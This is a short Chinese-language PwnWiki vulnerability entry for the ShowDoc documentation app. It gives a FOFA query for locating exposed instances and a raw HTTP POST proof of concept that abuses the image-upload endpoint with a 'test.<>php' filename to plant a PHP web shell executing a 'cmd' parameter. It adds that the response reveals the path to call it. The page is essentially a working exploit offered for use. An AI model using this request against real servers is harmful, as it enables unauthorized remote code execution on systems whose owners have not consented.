免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
FOFA
app="ShowDoc"
POC
POST /index.php?s=/home/page/uploadImg HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617 Content-Length: 259 ----------------------------921378126371623762173617 Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" Content-Type: text/plain <?php echo '123_test';@eval($_GETcmd)?> ----------------------------921378126371623762173617--
response包里有路径,直接访问即可。
免费、自由、人人可编辑的漏洞库--PwnWiki.com
